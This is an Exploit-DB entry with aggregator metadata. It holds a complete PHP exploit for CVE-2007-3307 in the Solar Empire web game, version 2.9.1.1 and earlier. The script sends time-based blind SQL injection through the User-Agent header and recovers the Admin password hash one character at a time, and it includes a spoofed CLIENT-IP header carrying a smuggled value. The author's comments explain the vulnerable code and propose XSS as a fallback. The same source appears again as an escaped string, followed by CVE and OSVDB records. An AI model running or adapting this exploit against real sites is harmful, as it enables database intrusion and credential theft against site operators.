ID EDB-ID:4078 Type exploitdb Reporter BlackHawk Modified 2007-06-18T00:00:00
Description
Solar Empire <= 2.9.1.1 Blind SQL Injection / Hash Retrieve Exploit. CVE-2007-3307. Webapps exploit for php platform
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
------------------------------------------------------------------------
Solar Empire <= 2.9.1.1 Blind SQL Injection / Hash Retrieve Exploit
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>
Thanks to rgod for the php code and Marty for the Love
Special Thanks to all the guys of milw0rm IRC channel for theyr help
------------------------------------------------------------------------
";
if ($argc<3) {
echo "
Usage: php ".$argv[0]." Host Path
Host: target server (ip/hostname)
Path: path of revbb
Example:
php ".$argv[0]." localhost /solar/
";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
/*
This plattform is quite old, but i know that some guys tooked it for making some
indipendent project.. they may have took this bug to, so i'll ceck as soon as i
finish my last exam..
Vuln Explanation:
goto common.inc.php:
function insert_history($l_id,$i_text)
{
global $db_name;
if(empty($db_name)){
$db_name = "None";
}
dbn("insert into user_history VALUES ('$l_id','".time()."','$db_name','".mysql_escape_string($i_text)."','$_SERVER[REMOTE_ADDR]','$_SERVER[HTTP_USER_AGENT]')");
}
$_SERVER[HTTP_USER_AGENT] is obviously not parsed by mq, so we can perform our sql-injection attack;
Because the admin name is always the same (Admin)we will attack this username, also because there isn't any counting
of the login attempts..
WARNING:
old version of mysql may not support subquerys, so the exploit wouldn't work.
to bypass this you can exploit the game sending an XSS into the log and praying that the admin
see it..
*/
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
#print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$starttime=time();
$sql="FuckYOU'), (1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*";
$packet ="POST ".$p."game_listing.php HTTP/1.0\r\n";
$data="l_name=Admin";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="CLIENT-IP: 999.999.999.999'; echo '123\r\n";//spoof
$packet.="User-Agent: $sql\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
//debug
#die($html);
sendpacketii($packet);
if (eregi("The used SELECT statements have a different number of columns",$html)){echo $html; die("\nunknown query error...");}
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(1);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
echo "
$uname Hash is: $password";
# Coded With BH Fast Generator v0.1
?>
# milw0rm.com [2007-06-18]
{"id": "EDB-ID:4078", "hash": "28927fe0d77652e3c66a6e02fa228336", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Solar Empire <= 2.9.1.1 - BlindSQL Injection / Hash Retrieve Exploit", "description": "Solar Empire <= 2.9.1.1 Blind SQL Injection / Hash Retrieve Exploit. CVE-2007-3307. Webapps exploit for php platform", "published": "2007-06-18T00:00:00", "modified": "2007-06-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4078/", "reporter": "BlackHawk", "references": [], "cvelist": ["CVE-2007-3307"], "lastseen": "2016-01-31T20:06:45", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T20:06:45"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-3307"]}, {"type": "osvdb", "idList": ["OSVDB:36303"]}], "modified": "2016-01-31T20:06:45"}, "vulnersScore": 7.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4078/", "sourceData": "#!/usr/bin/php -q -d short_open_tag=on\n<?\necho \"\n------------------------------------------------------------------------\nSolar Empire <= 2.9.1.1 Blind SQL Injection / Hash Retrieve Exploit\n\nby BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>\nThanks to rgod for the php code and Marty for the Love\n\nSpecial Thanks to all the guys of milw0rm IRC channel for theyr help\n\n------------------------------------------------------------------------\n\";\nif ($argc<3) {\necho \"\nUsage: php \".$argv[0].\" Host Path\nHost: target server (ip/hostname)\nPath: path of revbb\n\nExample:\nphp \".$argv[0].\" localhost /solar/\n\";\ndie;\n}\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n}\n/*\nThis plattform is quite old, but i know that some guys tooked it for making some\nindipendent project.. they may have took this bug to, so i'll ceck as soon as i\nfinish my last exam..\n\nVuln Explanation:\n\ngoto common.inc.php:\n\nfunction insert_history($l_id,$i_text)\n{\n\tglobal $db_name;\n\tif(empty($db_name)){\n\t\t$db_name = \"None\";\n\t}\n\tdbn(\"insert into user_history VALUES ('$l_id','\".time().\"','$db_name','\".mysql_escape_string($i_text).\"','$_SERVER[REMOTE_ADDR]','$_SERVER[HTTP_USER_AGENT]')\");\n}\n\n$_SERVER[HTTP_USER_AGENT] is obviously not parsed by mq, so we can perform our sql-injection attack;\nBecause the admin name is always the same (Admin)we will attack this username, also because there isn't any counting\nof the login attempts..\n\nWARNING:\n\nold version of mysql may not support subquerys, so the exploit wouldn't work.\nto bypass this you can exploit the game sending an XSS into the log and praying that the admin\nsee it..\n\n*/\n$host=$argv[1];\n$path=$argv[2];\n\n$port=80;\n$proxy=\"\";\n\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\n$md5s[0]=0;//null\n$md5s=array_merge($md5s,range(48,57)); //numbers\n$md5s=array_merge($md5s,range(97,102));//a-f letters\n#print_r(array_values($md5s));\n\n$j=1;$password=\"\";\nwhile (!strstr($password,chr(0)))\n{\nfor ($i=0; $i<=255; $i++)\n{\nif (in_array($i,$md5s))\n{\n$starttime=time();\n$sql=\"FuckYOU'), (1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*\";\n$packet =\"POST \".$p.\"game_listing.php HTTP/1.0\\r\\n\";\n$data=\"l_name=Admin\";\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\\r\\n\";\n$packet.=\"Accept-Language: it\\r\\n\";\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n$packet.=\"CLIENT-IP: 999.999.999.999'; echo '123\\r\\n\";//spoof\n$packet.=\"User-Agent: $sql\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\";\n$packet.=\"Cache-Control: no-cache\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacketii($packet);\n //debug\n #die($html);\n sendpacketii($packet);\nif (eregi(\"The used SELECT statements have a different number of columns\",$html)){echo $html; die(\"\\nunknown query error...\");}\n $endtime=time();\n echo \"endtime -> \".$endtime.\"\\r\\n\";\n $difftime=$endtime - $starttime;\n echo \"difftime -> \".$difftime.\"\\r\\n\";\n if ($difftime > 7) {$password.=chr($i);echo \"password -> \".$password.\"[???]\\r\\n\";sleep(1);break;}\n}\n if ($i==255) {die(\"Exploit failed...\");}\n }\n $j++;\n}\necho \"\n\n$uname Hash is: $password\";\n\n# Coded With BH Fast Generator v0.1\n?>\n\n# milw0rm.com [2007-06-18]\n", "osvdbidlist": ["36303"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:00", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in game_listing.php in Solar Empire 2.9.1.1 and earlier allows remote attackers to execute arbitrary SQL commands via the User-Agent HTTP header.", "modified": "2017-10-11T01:32:00", "id": "CVE-2007-3307", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3307", "published": "2007-06-21T01:30:00", "title": "CVE-2007-3307", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25716](https://secuniaresearch.flexerasoftware.com/advisories/25716/)\nOther Advisory URL: http://milw0rm.com/exploits/4078\n[CVE-2007-3307](https://vulners.com/cve/CVE-2007-3307)\nBugtraq ID: 24519\n", "modified": "2007-06-18T00:00:00", "published": "2007-06-18T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36303", "id": "OSVDB:36303", "title": "Solar Empire Generic game_listing.php User-Agent HTTP header SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
